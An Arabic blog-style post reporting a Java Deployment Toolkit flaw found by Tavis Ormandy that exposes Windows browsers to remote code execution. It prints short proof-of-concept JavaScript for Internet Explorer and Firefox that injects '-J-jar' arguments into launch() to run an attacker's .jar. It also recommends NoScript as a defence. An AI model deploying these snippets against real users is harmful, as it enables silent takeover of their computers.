اكتشف أحد مهندسي Google ثغرة خطيرة في JAVA موجودة في جميع الاصدارات التي تم اطلاقها بعد Java 6 Update 10. بحسب مكتشف الثغرة Tavis Ormandy والذي قام بنشر تفاصيلها بشكل علني مستخدمي ويندوز بجميع اصداراته معرضين للاختراق عن طريق المتصفّح بغض النظر عن نوعه طالما جافا منصّبة بالجهاز.

Java

 

تعتبر هذه الثغرة شديدة الخطورة لأنها تعرض جميع اصدارات نظام ويندوز للاختراق عن طريق المتصفّح بكل سهولة وذلك عن طريق توجيه المستخدم لرابط يحتوي على كود يستغل خطأ في Java Deployment Toolkit التي تم اضافتها الى JAVA 6 Update 10 مما يسمح له بتمرير ملف .jar الى Java Web Start (وهي تقنيّة تسمح للمطورين بتشغيل برامجهم المبرمجة بلغة جافا من الانترنت عن طريق بروتوكول JNLP) وتشغيله على جهاز المستخدم.

استغلال هذه الثغرة لا يتعلّق بالمتصفّح حيث يمكن استغلالها على Internet Explorer و Firefox أيضاً في نظام ويندوز. أما أنظمة لينوكس وماك فعلى الأغلب أنها غير مصابة بهذه الثغرة.

 

كود الاستغلال في متصفّح Internet Explorer سيكون بالشكل:

var o = document.createElement(“OBJECT”);

o.classid = “clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA”;

o.launch(“http: -J-jar -J\attacker.controlledexploit.jar none”);

 

أما متصفّح Mozilla Firefox فالكود هو نفسه تقريباً:

var o = document.createElement(“OBJECT”);

o.type = “application/npruntime-scriptable-plugin;deploymenttoolkit”

document.body.appendChild(o);

o.launch(“http: -J-jar -J\attacker.controlledexploit.jar none”);

 

بسبب خطأ في طريقة معالجة الدالة launch للرابط الذي وضعه المهاجم, هذا مكّنه من حقن ملف .jar سيتم تمريره الى javaws التي بدورها ستقوم بتشغيله على النظام. مكتشف الثغرة كتب أنه أبلغ Sun قبل نشرها بشكل علني لكن رد الشركة أتى أن هذه الثغرة ليست خطيرة بما فيه الكفاية ليقوموا بكسر دورة التحديث الخاصة بجافا.

شخصيّاً أجد الثغرة خطيرة جداً لأن Java تعتبر من الأمور الأساسية وموجودة في أغلب الأنظمة والسبب الآخر هو طبيعة هذه الثغرة والثبات الكبير الذي عرفت به جافا! مع اضافة تقنيات جديدة من الطبيعي أن تكتشف ثغرات جديدة ومن مدة بسيطة شركة Oracle أطلقت تحديث لجافا لاصلاح 27 مشاكل أمنية فيها. كما أن هذه الثغرة لا تستغل خطأ في الذاكرة مثلاً أو تحقن شيل كود وبهذه الحالة لا يوجد مشاكل مع تقنيات الحماية مثل ASLR أو DEP لأن الاستغلال مختلف تماماً عن باقي ثغرات المتصفح المعروفة وملف .jar سيعمل على النظام دون أي مشاكل.

مكتشف الثغرة وضع بعض الحلول للحماية منها يمكنكم الاطلاع عليها من الرابط الموجود بالأسفل, شخصيّاً أرى أن الحل الأفضل (والأسهل) هو استخدام Firefox مع اضافة NoScript وبهذه الحالة ستكون قادر على التحكم بشكل كامل بالأمور والسكريبتات التي سيتم تشغيلها على متصفّحك وهذا كفيل لحمايتك من أغلب ثغرات المتصفح وليس هذه الثغرة فقط.

 

لمزيد من المعلومات: Full Disclosure mailing list

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedIn